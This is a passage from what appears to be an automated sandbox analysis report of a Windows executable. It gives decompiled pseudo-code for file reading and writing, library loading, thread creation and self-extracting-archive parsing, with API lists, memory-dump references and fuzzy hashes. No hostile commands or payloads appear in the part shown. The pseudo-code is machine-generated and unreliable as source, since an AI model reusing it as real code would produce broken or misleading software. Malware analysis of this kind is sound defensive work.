          							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
          								L14:
          								_t15 = _t16 | 0xffffffff;
          							} else {
          								_t16 = GetLastError();
          								if(_t16 != 0x21) {
          									goto L14;
          								} else {
          									_push(0x8000);
          									goto L6;
          								}
          							}
          						} else {
          							_t16 = GetLastError();
          							if(_t16 != 0x6d) {
          								goto L10;
          							} else {
          								_t15 = 0;
          							}
          						}
          					} else {
          						_t16 = 0x4e20;
          						if(_a8 <= 0x4e20) {
          							goto L7;
          						} else {
          							_push(0x4e20);
          							L6:
          							_push(_a4);
          							_t15 = E001F964A(_t25);
          						}
          					}
          				}
          				return _t15;
          			}








          APIs
          • GetStdHandle.KERNEL32(000000F6), ref: 001F965A
          • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 001F9672
          • GetLastError.KERNEL32 ref: 001F96A4
          • GetLastError.KERNEL32 ref: 001F96C3
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ErrorLast$FileHandleRead
          • String ID:
          • API String ID: 2244327787-0
          • Opcode ID: b83a1bcd553f39204dc4bbbd6a864757b0656a5a7cf9fbf767fab7b40696e3d9
          • Instruction ID: b3f6e00d026e82c038405253df767263fab5db9c756b75b25da86e692da8da65
          • Opcode Fuzzy Hash: b83a1bcd553f39204dc4bbbd6a864757b0656a5a7cf9fbf767fab7b40696e3d9
          • Instruction Fuzzy Hash: 29115A3090020CFFDB346AA49954BB977A9AB14331F10852AFA2AC5190DB758E84DF51
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 95%
          			E00219A2C(signed int _a4) {
          				signed int _t9;
          				void* _t10;
          				void* _t13;
          				signed int _t15;
          				WCHAR* _t22;
          				signed int _t24;
          				signed int* _t25;
          				void* _t27;
          
          				_t9 = _a4;
          				_t25 = 0x250768 + _t9 * 4;
          				_t24 =  *_t25;
          				if(_t24 == 0) {
          					_t22 =  *(0x225ba0 + _t9 * 4);
          					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
          					_t27 = _t10;
          					if(_t27 != 0) {
          						L8:
          						 *_t25 = _t27;
          						if( *_t25 != 0) {
          							FreeLibrary(_t27);
          						}
          						_t13 = _t27;
          						L11:
          						return _t13;
          					}
          					_t15 = GetLastError();
          					if(_t15 != 0x57) {
          						_t27 = 0;
          					} else {
          						_t15 = LoadLibraryExW(_t22, _t27, _t27);
          						_t27 = _t15;
          					}
          					if(_t27 != 0) {
          						goto L8;
          					} else {
          						 *_t25 = _t15 | 0xffffffff;
          						_t13 = 0;
          						goto L11;
          					}
          				}
          				_t4 = _t24 + 1; // 0x4319796b
          				asm("sbb eax, eax");
          				return  ~_t4 & _t24;
          			}












          APIs
          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00212E0F,00000000,00000000,?,002199D3,00212E0F,00000000,00000000,00000000,?,00219BD0,00000006,FlsSetValue), ref: 00219A5E
          • GetLastError.KERNEL32(?,002199D3,00212E0F,00000000,00000000,00000000,?,00219BD0,00000006,FlsSetValue,00226058,00226060,00000000,00000364,?,002185E8), ref: 00219A6A
          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002199D3,00212E0F,00000000,00000000,00000000,?,00219BD0,00000006,FlsSetValue,00226058,00226060,00000000), ref: 00219A78
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: LibraryLoad$ErrorLast
          • String ID:
          • API String ID: 3177248105-0
          • Opcode ID: d2f31dd2ca30ae0bca1a0acf133039838955e40ac51fb6fa2225a818d3a94649
          • Instruction ID: 3402d1b6f78bcd826db8ec48f2987a76a9eb6989470e0a4264b17c15cc64c27e
          • Opcode Fuzzy Hash: d2f31dd2ca30ae0bca1a0acf133039838955e40ac51fb6fa2225a818d3a94649
          • Instruction Fuzzy Hash: B601F732261233BBC7318FA8AC58E9677D8BF65BA17500224FD0AD3140D731E9A9C6E0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 71%
          			E002004F5() {
          				long _v4;
          				void* __ecx;
          				void* __esi;
          				void* __ebp;
          				void* _t5;
          				void* _t7;
          				int _t8;
          				void* _t12;
          				void** _t18;
          				void* _t22;
          
          				_t12 = 0;
          				if( *0x2300e0 > 0) {
          					_t18 = 0x2300e4;
          					do {
          						_t7 = CreateThread(0, 0x10000, E0020062F, 0x2300e0, 0,  &_v4); // executed
          						_t22 = _t7;
          						if(_t22 == 0) {
          							_push(L"CreateThread failed");
          							_push(0x2300e0);
          							E001F6CC9(E0020E214(E001F6CCE(0x2300e0)), 0x2300e0, 0x2300e0, 2);
          						}
          						 *_t18 = _t22;
          						 *0x002301E4 =  *((intOrPtr*)(0x2301e4)) + 1;
          						_t8 =  *0x237368; // 0x0
          						if(_t8 != 0) {
          							_t8 = SetThreadPriority( *_t18, _t8);
          						}
          						_t12 = _t12 + 1;
          						_t18 =  &(_t18[1]);
          					} while (_t12 <  *0x2300e0);
          					return _t8;
          				}
          				return _t5;
          			}














          APIs
          • CreateThread.KERNELBASE ref: 00200519
          • SetThreadPriority.KERNEL32(?,00000000), ref: 00200560
            • Part of subcall function 001F6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F6CEC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Thread$CreatePriority__vswprintf_c_l
          • String ID: CreateThread failed
          • API String ID: 2655393344-3849766595
          • Opcode ID: 423b0e0f20c1aad4fcb0bcc5ac2d3ea7b5365aa3a1cda00d7f159b427653349e
          • Instruction ID: d751e97509c0580334a39b1de523d095e42b0e797d3bad8d87d3ab2ca6bbfdcd
          • Opcode Fuzzy Hash: 423b0e0f20c1aad4fcb0bcc5ac2d3ea7b5365aa3a1cda00d7f159b427653349e
          • Instruction Fuzzy Hash: 2501F9B1364706BFE7346F90ACC5F6677ACFB55751F10002DF6C5621C2CAA169A9CA30
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 92%
          			E001F9C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
          				void* __ebp;
          				int _t24;
          				long _t32;
          				void* _t36;
          				void* _t42;
          				void* _t52;
          				intOrPtr* _t53;
          				void* _t57;
          				intOrPtr _t58;
          				long _t59;
          
          				_t52 = __edx;
          				_t59 = _a8;
          				_t53 = __ecx;
          				if(_t59 != 0) {
          					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
          						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
          					}
          					while(1) {
          						_a8 = _a8 & 0x00000000;
          						_t42 = 0;
          						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
          							goto L12;
          						}
          						_t57 = 0;
          						if(_t59 == 0) {
          							L14:
          							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
          								L21:
          								 *((char*)(_t53 + 8)) = 1;
          								return _t42;
          							} else {
          								_t56 = _t53 + 0x1e;
          								if(E001F6C55(0x2300e0, _t53 + 0x1e, 0) == 0) {
          									E001F6E9B(0x2300e0, _t59, 0, _t56);
          									goto L21;
          								}
          								if(_a8 < _t59 && _a8 > 0) {
          									_t58 =  *_t53;
          									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
          									asm("sbb edx, 0x0");
          									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
          								}
          								continue;
          							}
          						} else {
          							goto L7;
          						}
          						while(1) {
          							L7:
          							_t32 = _t59 - _t57;
          							if(_t32 >= 0x4000) {
          								_t32 = 0x4000;
          							}
          							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
          							asm("sbb bl, bl");
          							_t42 =  ~_t10 + 1;
          							if(_t42 == 0) {
          								goto L14;
          							}
          							_t57 = _t57 + 0x4000;
          							if(_t57 < _t59) {
          								continue;
          							}
          							L13:
          							if(_t42 != 0) {
          								goto L21;
          							}
          							goto L14;
          						}
          						goto L14;
          						L12:
          						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
          						asm("sbb al, al");
          						_t42 =  ~(_t24 - 1) + 1;
          						goto L13;
          					}
          				}
          				return 1;
          			}














          APIs
          • GetStdHandle.KERNEL32(000000F5,?,?,001FC90A,00000001,?,?,?,00000000,00204AF4,?,?,?,?,?,00204599), ref: 001F9C4F
          • WriteFile.KERNEL32(?,00000000,?,002047A1,00000000,?,?,00000000,00204AF4,?,?,?,?,?,00204599,?), ref: 001F9C8F
          • WriteFile.KERNELBASE(?,00000000,?,002047A1,00000000,?,00000001,?,?,001FC90A,00000001,?,?,?,00000000,00204AF4), ref: 001F9CBC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: FileWrite$Handle
          • String ID:
          • API String ID: 4209713984-0
          • Opcode ID: 73e8d065e2a6455cd78ce971fd690040e933e2631cf7de00aa1ec11f90f7ca6e
          • Instruction ID: bb70aed6f89f478eafb49332a6a4df35dcc3b3bd9fdfac598bd3a0c722c5a687
          • Opcode Fuzzy Hash: 73e8d065e2a6455cd78ce971fd690040e933e2631cf7de00aa1ec11f90f7ca6e
          • Instruction Fuzzy Hash: 223156B120420DAFDB24AF64C808BBAB7E8FFA1710F108119F39593190C735A84DCBA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001F9EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
          				short _v4100;
          				signed int _t8;
          				long _t10;
          				void* _t11;
          				int _t18;
          				WCHAR* _t21;
          
          				E0020D940();
          				_t21 = _a4;
          				_t8 =  *(E001FB927(__eflags, _t21)) & 0x0000ffff;
          				if(_t8 == 0x2e || _t8 == 0x20) {
          					L3:
          					if(E001F9E6B(_t21) != 0 || E001FB32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
          						_t10 = GetLastError();
          						__eflags = _t10 - 2;
          						if(_t10 == 2) {
          							L12:
          							_t11 = 2;
          						} else {
          							__eflags = _t10 - 3;
          							if(_t10 == 3) {
          								goto L12;
          							} else {
          								_t11 = 1;
          							}
          						}
          					} else {
          						goto L6;
          					}
          				} else {
          					_t18 = CreateDirectoryW(_t21, 0); // executed
          					if(_t18 != 0) {
          						L6:
          						if(_a8 != 0) {
          							E001FA12F(_t21, _a12); // executed
          						}
          						_t11 = 0;
          					} else {
          						goto L3;
          					}
          				}
          				return _t11;
          			}










          APIs
          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001F9F19
          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001F9F4C
          • GetLastError.KERNEL32(?,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001F9F69
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CreateDirectory$ErrorLast
          • String ID:
          • API String ID: 2485089472-0
          • Opcode ID: 0e4be975c0d674492b3b316d097bcde41e68db89f8cb32faea4293ddbdcb62ba
          • Instruction ID: 2a9c562f0956539b274e3ddf1bc91a20031a704a9e2c6e4af26fcda801493179
          • Opcode Fuzzy Hash: 0e4be975c0d674492b3b316d097bcde41e68db89f8cb32faea4293ddbdcb62ba
          • Instruction Fuzzy Hash: F401D4B151822CB6DB31BBB49C49BFE3B4CAF16740F040441FB05E60A1D7A4CA82C6E6
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 95%
          			E001F1973(intOrPtr* __ecx, intOrPtr __edx) {
          				signed int _t106;
          				intOrPtr _t109;
          				signed int _t110;
          				signed int _t112;
          				signed int _t116;
          				signed int _t119;
          				signed int _t127;
          				intOrPtr _t128;
          				char _t129;
          				char _t138;
          				intOrPtr _t143;
          				signed int _t144;
          				signed int _t145;
          				void* _t147;
          				signed int _t152;
          				signed int _t153;
          				signed int _t155;
          				void* _t159;
          				void* _t160;
          				signed int _t166;
          				intOrPtr* _t169;
          				signed int _t175;
          				void* _t176;
          				signed int _t178;
          				char* _t190;
          				intOrPtr _t191;
          				intOrPtr _t197;
          				intOrPtr* _t199;
          				signed int _t202;
          				void* _t204;
          				char* _t205;
          				intOrPtr _t206;
          				void* _t207;
          
          				_t197 = __edx;
          				_t169 = __ecx;
          				E0020D870(E00221451, _t207);
          				_t199 = _t169;
          				_push(7);
          				_t164 = _t199 + 0x21f8;
          				_push(_t199 + 0x21f8);
          				 *((char*)(_t199 + 0x6cbc)) = 0;
          				 *((char*)(_t199 + 0x6cc4)) = 0;
          				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
          					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
          					_t106 = E001F1D09(_t164, 7);
          					__eflags = _t106;
          					if(_t106 == 0) {
          						E001F6ED7(_t207 - 0x38, "@."");
          						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
          						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
          						_t197 =  *_t199;
          						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
          						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
          						_t175 = _t110;
          						_t202 = 0;
          						 *(_t207 - 0x14) = _t175;
          						_t166 = 1;
          						__eflags = _t175;
          						if(_t175 <= 0) {
          							L22:
          							__eflags =  *(_t199 + 0x6cc0);
          							_t176 = _t207 - 0x38;
          							if( *(_t199 + 0x6cc0) != 0) {
          								_t37 = _t207 - 4; // executed
          								 *_t37 =  *(_t207 - 4) | 0xffffffff;
          								__eflags =  *_t37;
          								E001F159C(_t176); // executed
          								L25:
          								_t112 =  *(_t199 + 0x6cb0);
          								__eflags = _t112 - 4;
          								if(__eflags != 0) {
          									__eflags = _t112 - 3;
          									if(_t112 != 3) {
          										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
          										L32:
          										 *((char*)(_t207 - 0xd)) = 0;
          										__eflags = E001F391A(_t199, _t197);
          										 *(_t207 - 0xe) = 0;
          										__eflags = 0 - 1;
          										if(0 != 1) {
          											L38:
          											_t116 =  *((intOrPtr*)(_t207 - 0xd));
          											L39:
          											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
          											__eflags = _t178;
          											if(_t178 == 0) {
          												L41:
          												__eflags =  *((char*)(_t199 + 0x6cc4));
          												if( *((char*)(_t199 + 0x6cc4)) != 0) {
          													L43:
          													__eflags = _t178;
          													if(__eflags == 0) {
          														E001F134C(__eflags, 0x1b, _t199 + 0x1e);
          													}
          													__eflags =  *((char*)(_t207 + 8));
          													if( *((char*)(_t207 + 8)) != 0) {
          														L48:
          														__eflags =  *(_t207 - 0xe);
          														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
          														if( *(_t207 - 0xe) == 0) {
          															L69:
          															__eflags =  *((char*)(_t199 + 0x6cb5));
          															if( *((char*)(_t199 + 0x6cb5)) == 0) {
          																L71:
          																E001FFAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
          																L72:
          																_t119 = _t166;
          																goto L73;
          															}
          															__eflags =  *((char*)(_t199 + 0x6cb9));
          															if( *((char*)(_t199 + 0x6cb9)) == 0) {
          																goto L72;
          															}
          															goto L71;
          														}
          														__eflags =  *((char*)(_t199 + 0x21e0));
          														if( *((char*)(_t199 + 0x21e0)) == 0) {
          															L51:
          															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
          															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
          															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
          															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
          															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
          															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
          															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
          															while(1) {
          																_t127 = E001F391A(_t199, _t197);
          																__eflags = _t127;
          																if(_t127 == 0) {
          																	break;
          																}
          																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
          																__eflags = _t128 - 3;
          																if(_t128 != 3) {
          																	__eflags = _t128 - 2;
          																	if(_t128 == 2) {
          																		__eflags =  *((char*)(_t199 + 0x6cb5));
          																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
          																			L66:
          																			_t129 = 0;
          																			__eflags = 0;
          																			L67:
          																			 *((char*)(_t199 + 0x6cb9)) = _t129;
          																			L68:
          																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
          																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
          																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
          																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
          																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
          																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
          																			goto L69;
          																		}
          																		__eflags =  *((char*)(_t199 + 0x3318));
          																		if( *((char*)(_t199 + 0x3318)) != 0) {
          																			goto L66;
          																		}
          																		_t129 = _t166;
          																		goto L67;
          																	}
          																	__eflags = _t128 - 5;
          																	if(_t128 == 5) {
          																		goto L68;
          																	}
          																	L60:
          																	E001F1E3B(_t199);
          																	continue;
          																}
          																__eflags =  *((char*)(_t199 + 0x6cb5));
          																if( *((char*)(_t199 + 0x6cb5)) == 0) {
          																	L56:
          																	_t138 = 0;
          																	__eflags = 0;
          																	L57:
          																	 *((char*)(_t199 + 0x6cb9)) = _t138;
          																	goto L60;
          																}
          																__eflags =  *((char*)(_t199 + 0x5668));
          																if( *((char*)(_t199 + 0x5668)) != 0) {
          																	goto L56;
          																}
          																_t138 = _t166;
          																goto L57;
          															}
          															goto L68;
          														}
          														__eflags =  *((char*)(_t199 + 0x6cbc));
          														if( *((char*)(_t199 + 0x6cbc)) != 0) {
          															goto L69;
          														}
          														goto L51;
          													} else {
          														L46:
          														_t119 = 0;
          														L73:
          														L74:
          														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
          														return _t119;
          													}
          												}
          												__eflags = _t116;
          												if(_t116 != 0) {
          													goto L48;
          												}
          												goto L43;
          											}
          											__eflags =  *((char*)(_t207 + 8));
          											if( *((char*)(_t207 + 8)) == 0) {
          												goto L46;
          											}
          											goto L41;
          										}
          										__eflags = 0;
          										 *((char*)(_t207 - 0xd)) = 0;
          										while(1) {
          											E001F1E3B(_t199);
          											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
          											__eflags = _t143 - _t166;
          											if(_t143 == _t166) {
          												break;
          											}
          											__eflags =  *((char*)(_t199 + 0x21e0));
          											if( *((char*)(_t199 + 0x21e0)) == 0) {
          												L37:
          												_t144 = E001F391A(_t199, _t197);
          												__eflags = _t144;
          												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
          												 *(_t207 - 0xe) = _t145;
          												__eflags = _t145 - 1;
          												if(_t145 == 1) {
          													continue;
          												}
          												goto L38;
          											}
          											__eflags = _t143 - 4;
          											if(_t143 == 4) {
          												break;
          											}
          											goto L37;
          										}
          										_t116 = _t166;
          										goto L39;
          									}
          									_t205 = _t199 + 0x21ff;
          									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
          									__eflags = _t147 - _t166;
          									if(_t147 != _t166) {
          										goto L46;
          									}
          									__eflags =  *_t205;
          									if( *_t205 != 0) {
          										goto L46;
          									}
          									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
          									goto L32;
          								}
          								E001F134C(__eflags, 0x3c, _t199 + 0x1e);
          								goto L46;
          							}
          							E001F159C(_t176);
          							goto L46;
          						} else {
          							goto L6;
          						}
          						do {
          							L6:
          							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
          							__eflags =  *_t190 - 0x52;
          							if( *_t190 != 0x52) {
          								goto L17;
          							}
          							_t152 = E001F1D09(_t190, _t110 - _t202);
          							__eflags = _t152;
          							if(_t152 == 0) {
          								L16:
          								_t110 =  *(_t207 - 0x14);
          								goto L17;
          							}
          							_t191 =  *((intOrPtr*)(_t207 - 0x18));
          							 *(_t199 + 0x6cb0) = _t152;
          							__eflags = _t152 - _t166;
          							if(_t152 != _t166) {
          								L19:
          								_t197 =  *_t199;
          								_t153 = _t202 + _t191;
          								 *(_t199 + 0x6cc0) = _t153;
          								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
          								_t155 =  *(_t199 + 0x6cb0);
          								__eflags = _t155 - 2;
          								if(_t155 == 2) {
          									L21:
          									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
          									goto L22;
          								}
          								__eflags = _t155 - 3;
          								if(_t155 != 3) {
          									goto L22;
          								}
          								goto L21;
          							}
          							__eflags = _t202;
          							if(_t202 <= 0) {
          								goto L19;
          							}
          							__eflags = _t191 - 0x1c;
          							if(_t191 >= 0x1c) {
          								goto L19;
          							}
          							__eflags =  *(_t207 - 0x14) - 0x1f;
          							if( *(_t207 - 0x14) <= 0x1f) {
          								goto L19;
          							}
          							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
          							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
          							if( *((char*)(_t159 + 0x1c)) != 0x52) {
          								goto L16;
          							}
          							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
          							if( *((char*)(_t159 + 0x1d)) != 0x53) {
          								goto L16;
          							}
          							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
          							if( *((char*)(_t159 + 0x1e)) != 0x46) {
          								goto L16;
          							}
          							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
          							if( *((char*)(_t159 + 0x1f)) == 0x58) {
          								goto L19;
          							}
          							goto L16;
          							L17:
          							_t202 = _t202 + 1;
          							__eflags = _t202 - _t110;
          						} while (_t202 < _t110);
          						goto L22;
          					}
          					 *(_t199 + 0x6cb0) = _t106;
          					_t166 = 1;
          					__eflags = _t106 - 1;
          					if(_t106 == 1) {
          						_t206 =  *_t199;
          						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
          						asm("sbb edx, 0x0");
          						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
          					}
          					goto L25;
          				}
          				_t119 = 0;
          				goto L74;
          			}





































          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog
          • String ID: @."
          • API String ID: 3519838083-1371282458
          • Opcode ID: 753c990834148efcffb4777db195934c91adb79827cf9f1ff00661f2fa639f30
          • Instruction ID: 775994ecd5b461f96077fd29ec300150c9b7f5847754f712827c3d1c3dec45ee
          • Opcode Fuzzy Hash: 753c990834148efcffb4777db195934c91adb79827cf9f1ff00661f2fa639f30
          • Instruction Fuzzy Hash: DFB1F270B0068AFFEB29CF78C484BB9FBE5BF15314F180259E65983281D730A964CB91
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 93%
          			E001F399D(void* __ecx, signed int __edx) {
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				char _t76;
          				signed int _t83;
          				intOrPtr _t94;
          				void* _t120;
          				char _t121;
          				void* _t123;
          				void* _t130;
          				signed int _t144;
          				signed int _t148;
          				void* _t151;
          				void* _t153;
          
          				_t143 = __edx;
          				_t123 = __ecx;
          				E0020D870(E002211BE, _t153);
          				E0020D940();
          				_t151 = _t123;
          				_t156 =  *((char*)(_t151 + 0x6cc4));
          				if( *((char*)(_t151 + 0x6cc4)) == 0) {
          					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
          					if(__eflags > 0) {
          						L26:
          						E001F134C(__eflags, 0x1e, _t151 + 0x1e);
          						goto L27;
          					}
          					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
          					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
          					if(__eflags > 0) {
          						goto L26;
          					}
          					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
          					__eflags = _t83;
          					if(_t83 != 0) {
          						L7:
          						_t120 = _t151 + 0x20e8;
          						E001FC5C9(_t83, _t120);
          						_push(_t120);
          						E002014DE(_t153 - 0xe6ec, __eflags);
          						_t121 = 0;
          						 *((intOrPtr*)(_t153 - 4)) = 0;
          						E00202842(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
          						_t148 =  *(_t153 + 8);
          						__eflags =  *(_t153 + 0xc);
          						if( *(_t153 + 0xc) != 0) {
          							L15:
          							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
          							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
          								L18:
          								E001FA728(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
          								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
          								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
          								 *((char*)(_t151 + 0x2110)) = _t121;
          								E001FC67C(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
          								_t130 = _t151 + 0x20e8;
          								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
          								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
          								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
          								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
          								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
          								_t144 =  *(_t151 + 0x5634);
          								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
          								 *(_t153 - 0x9aa0) = _t144;
          								 *((char*)(_t153 - 0x9a8c)) = _t121;
          								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
          								if(__eflags != 0) {
          									E002024D9(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
          								} else {
          									_push(_t144);
          									_push(_t94);
